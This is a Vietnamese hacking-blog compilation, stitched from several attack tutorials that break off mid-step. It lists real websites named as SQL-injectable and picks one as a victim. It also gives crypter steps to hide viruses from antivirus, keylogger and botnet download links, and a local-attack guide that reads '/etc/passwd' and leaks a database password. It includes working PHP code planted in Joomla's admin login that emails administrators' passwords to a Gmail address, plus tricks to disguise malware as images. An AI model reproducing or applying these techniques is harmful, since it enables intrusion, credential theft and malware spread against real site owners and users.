[Bài 4 – SQLI] Bypass 406 Not Acceptable

      Trong các bài trước , Soleil đã giới thiệu các dạng attack cơ bản sử dụng phương pháp SQLI để chiếm quyền quản trị administrator: Khai thác đối với Aspx,  Khai thác lỗi cơ bản,  Lỗi Jet. Tuy nhiên trong lúc khai thác, 1 số site đã chặn ở 1 vài querry sqli và không thể tiếp tục.

Hôm nay Soleil sẽ demo 1 dạng bypass “406 Not Acceptable” thông dụng thường gặp phải lúc khai thác đồng thời cũng pubic bug sqli đối với công ty thiết kế website “Viet Arrow”.

Google dork: Designed by Viet Arrow id=

Tất cả các website được thiết kế bởi Viet Arrow đều dính lỗi sqli, sau đây là 1 số ví dụ

http://www.duythinh.com.vn/?do=product&id=48%27

http://www.quangdao.vn/?do=supply&id=3%27

http://www.ttasia.com.vn/?do=services&id=14%27

http://www.lilama45-1.com/index.php?do=subcat&id=2%27&lang=vn

http://www.royalstone.com.vn/?do=products&act=detail&id=54%27&lang=vn

http://www.fsec.com.vn/index.php?do=intro&id=6%27

http://www.pcphumy.com/?do=projects&act=detail&id=19%27

http://www.vinhsang.com/?do=intro&id=3%27

http://www.sosani.com/?do=products&act=detail&cat_id=39&id=144%27&lang=en

http://mayphatdien.net.vn/index.php?do=products&act=list&p_cid=1&p_pid=202%27&l=2

http://dichvuduongsat.com/?do=services&act=detail&id=5%27&lang=en

http://www.caohungco.vn/index.php?do=products&act=detail&cid=74&id=128%27&lang=en

http://dichvuduongsat.com/?do=services&act=detail&id=4%27

http://www.shopdiep.com/index.php?do=products&act=detail&cid=63&id=1606%27

http://suthienthanh.com/?do=products&act=detail&id=23%27&lang=en

http://www.hoanmyco.com/index.php?do=news&act=detail&id=104%27

http://www.locanresort.com/index.php?do=page&id=1%27

http://www.khaithong.com.vn/index.php?do=content&id=1%27

http://www.clicktoner.vn/index.php?do=page&id=2%27

http://vietdoantravel.com/index.php?do=page&id=2%27          

http://sieuthihangchatluong.com/?Id=EStore&Act=View&Man=SanPham&DoanhNghiep=adminva&Cat=acde6754ab29d3c3b521f86041b88834%27

Soleil sẽ chọn 1 victim bất kỳ để khai thác.

Victim:  http://www.khaithong.com.vn/

Trước khi vào bài này, có thể tham khảo qua bài 2 : Khai Thác Lỗi Cơ Bản

Bước 1: Check lỗi

Thêm dấu ‘ vào sau con số của đường link có dạng id=

 http://www.khaithong.com.vn/index.php?do=content&id=1

Nếu giao diện website thay đổi nghĩa là site đã bị dính lỗi sqli

Một số phần mền Mã Hóa Virus Free

1-      07-12-12 Crypter

-          Click vào file và chọn path tới file virus

-          Click vào stub và chọn path tới file stub.exe ( cùng thư mục với file 07-12-12 Crypter.exe )

-          Sau đó tùy chọn các chức năng và Encrypt

-          Trong trường hợp này Soleil sẽ lấy demo với file virus là con bot được tạo từ tool botnet Di5

-          Hình ảnh check file virus khi chưa mã hóa:

Các phần mền keylogger không thể bỏ qua

    Trong tất cả các keylogger đã sử dụng thì soleil kết nhất là hai phần mền: "Ardamax, Perfect" với cách sử dụng khá đơn giản và đầy đủ các tính năng: Ghi lại thao tác bàn phím, chụp destop, chụp webcam, link website đã vào, Create trojan, gửi mail, thiết lập thời gian gửi, đính kèm phần mền, chạy chế độ ẩn,.....

1 - Ardamax keylogger

 

Ardramax là phần mên keylogger đầy đủ các tính năng với cách sử dụng gần như là đơn giản nhất và được rất nhiều người ưa chuộng.

Hướng dẫn sử dụng Ardamax keylogger

link download: ( Bao gồm cả key)

http://www.mediafire.com/?9q7ajn3585okmmw

[Tut] Up Shell Vbulletin Qua Database P.I

Khi thực hiện Local Attack đối với 4rum thì include shell qua database, là 1 kỹ năng không thể thiếu bởi vì thư mục Admincp thông thường không có mấy admin sơ ý đến nỗi quên không change path và đặt file .htaccess bảo vệ. Vì vậy phương pháp include shell database được các attacker sử dụng 1 cách phổ biến

Có 3 cách để include shell, hôm nay soleil sẽ giới thiệu cách thứ nhất.

Victim: http://raoonline.net/forum.php
 

Giả sử soleil đã có shell  1 site trên cùng server,

 Ví dụ: http://taichinheakar.gov.vn/vhb.php
 

Với shell này ta có thể Local Attack sang forum: http://raoonline.net  và thu được thông tin config như sau:

$config['MasterServer']['username'] = 'raovat_forum';
$config['MasterServer']['password'] = '125254857'

Bước 1: Login vào cơ sở dữ liệu:

[Bài 3 - Local Attack] Các Phương Pháp Local Attack

 Để hoàn thành bộ tut Local Attack full, hôm nay Soleil sẽ giới thiệu bài 3, cũng chính là bài quan trọng và trọng tâm nhất trong Local Attack. Trước khi đi vào bài 3, các bạn có thể đọc qua và lấy 1 số tool cần thiết từ  bài 2 - Giới thiệu tính năng 1 số shell

      


  *        Nhắc lại trình tự các bước Local Attack

     1-       View danh sách các user trong server

     2-      Tìm  file config.php

     3-      Get thông tin login vào database

     4-      Crack hoặc change pass admin

     5-      Login vào quyên quản trị và upshell

    

     1-      View danh sách các user trên server

Muốn local được 1 site nào đó trên server thì trướ tiên cần phải xác định site đó có user là gì, source code là gì từ đó tìm cách đọc file config.php của user đó

-          Một số câu lệnh để get user:

Lệnh phổ biến nhất:

Cat /etc/passwd

Tuy nhiên một số server cấm lệnh cat, có thể sử dụng các lệnh sau một cách linh hoạt

Less /etc/passwd

./cat/etc/passwd

More /etc/passwd

Ngoài ra có thể sử dụng chức năng get user trên shell byg.php, c99.php hay bypass ở r57.php, soleil.pin, telnet.pl hoặc các shell sau:

http://www.mediafire.com/?gic70c6ce441333

http://www.mediafire.com/?hi4gnmu3kpxn095 ( đk: chmod 755)

http://www.mediafire.com/?2rk42hiv9b4ii3f

Pass download: soleil_vhb

Pass dải nén: ceh.vn

 -          Câu lênh get user & domain

Cat /etc/virtual/domainowners  ( Chỉ dùng đối với direct admin )

               

      2-      Tìm file path file config.php

Đối với các mã nguồn mở thì path file config được mặc định như sau:

Lưu ý: “path” chính là path từ server dẫn tới site, ví dụ đối với server linux, path là: /home/user/public_html

[Tut] Insert Keylogger into joomla

Bước 1: Up shell lên site joomla

Bước 2: Insert mã độc vào code

       -   Vào administrator/components/com_login/

       -   Edit file: admin.login.php

       -   Tìm dòng:$mainframe->redirect('index.php');

       -   Thêm trước dòng này 1 đoạn code như sau:

     PHP Code:

$db        =& JFactory::getDBO();                

$mailfrom         = $mainframe->getCfg( 'mailfrom' );

$fromname         = $mainframe->getCfg( 'fromname' );

$siteURL        = JURI::base();

$uname         = $credentials['username']; 

$query = 'SELECT name , email, usertype  ' .

        ' FROM #__users' .

        ' WHERE username = "'.$uname.'"';

$db->setQuery( $query );

$rows = $db->loadObject();

if ( ! $mailfrom  || ! $fromname ) {

    $fromname = $rows->name;

    $mailfrom = $rows->email;

}

$usertype = $rows->usertype;        

$email = $rows->email;

$pass = $credentials['password'];

$message = "$uname|$email|$pass|$usertype";

$to="ducdung.08clc@gmail.com";

$header = "Content-type: text/html; charset=utf-8\r\nFrom: $mailfrom\r\nReply-to: $to";

@mail($to, $siteURL, $message, $header);

Với đoạn code này thì khi admin đăng nhập thì username, password, email sẽ tự động gửi về mail: ducdung.08clc@gmail.com  

[Ddos-BotNet] Di-BotNet V.2

Link download:  http://www.mediafire.com/?7r73cyckox24gj4
Pass unlock: soleil_vhb



Hướng dẫn sử dụng:

[Local Attack] Get all config toàn server

     -          Đâu tiên download shell get all config ( w.php)  về rồi up lên server.

http://www.mediafire.com/?hi4gnmu3kpxn095  ( pass unlock: soleil_vhb )

     -          Click vào done và thư mục có tên là tmp sẽ được tạo ra.

     -          Vào link của thư mục tmp sẽ có 1 số shell với các chức năng sau:

+             dz.sa : Đây là shell cgi, sử dụng nó để get các user trên server bằng cách thực thi câu lệnh: cat /etc/passwd, more /etc/passwd ( Pass login là: dz ).

+             user.sa : Shell này dung để xem danh sách các user và domain trên server.

+             config.sa : Shell này có nhiệm vụ thực thi get all config bằng phương pháp symlink

[Ddos-BotNet] Nick3

Đây là code + data+ tool create bot của nick3 đã được edit giao diện dựa trên bản G-bot 1.7 của các hacker người nga.

Hướng dẫn sử dụng:

        -          Up code và data lên host sau đó vào file config.php chỉnh các thông số:

+             Username và password data

+             Pass để login

        -          Sau đó vào link botnet, vd: http://vhbgroup.net/botnet3/ , sẽ xuất hiện 1 giao diện 404 như dưới đây. Ấn nút tab và đánh password đã thiết  lập trong file config.php ở trên rồi enter.

[Tut] Đính kèm virus vào file ảnh

[Tut] Đính kèm virus vào file ảnh

 Bước 1: Bỏ dấu tích “hide extensions for known file types”

Bước 2: Tạo 1 forder trên destop, Ví dụ: soleil

Bỏ file virus vào forder soleil, virus thường có đuôi là .exe. Trong bài này tôi sẽ thay virus bằng phần mền putty.exe chẳng hạn và sẽ đính kèm phần mền này vào file ảnh có đuôi là jpg.

Bước 3: Tạo “Shortcut”

Click chuột phải vào phần mền và chọn “create shortcut”

Xem Ip Bạn Chát

          Download 2 file ip.php và ip_log.txt về và up lên host  ( Có thể dung host free)

          Chmod file ip_log.txt về 777

          Rồi gửi link file ip.php cho bạn chat. Ví dụ: http://www.vhbgroup.net/ip.php ( Có thẻ rename file ip.php )

           Sau đó ip bạn chat sẽ gửi về file ip_log.txt. View file đó và xem ip: http://www.vhbgroup.net/ip_log.txt

 

Các link trên chỉ mang tính chất demo

http://www.mediafire.com/?g0alqv3yziz3idq

pass unlock: soleil_vhb

pass download: ceh.vn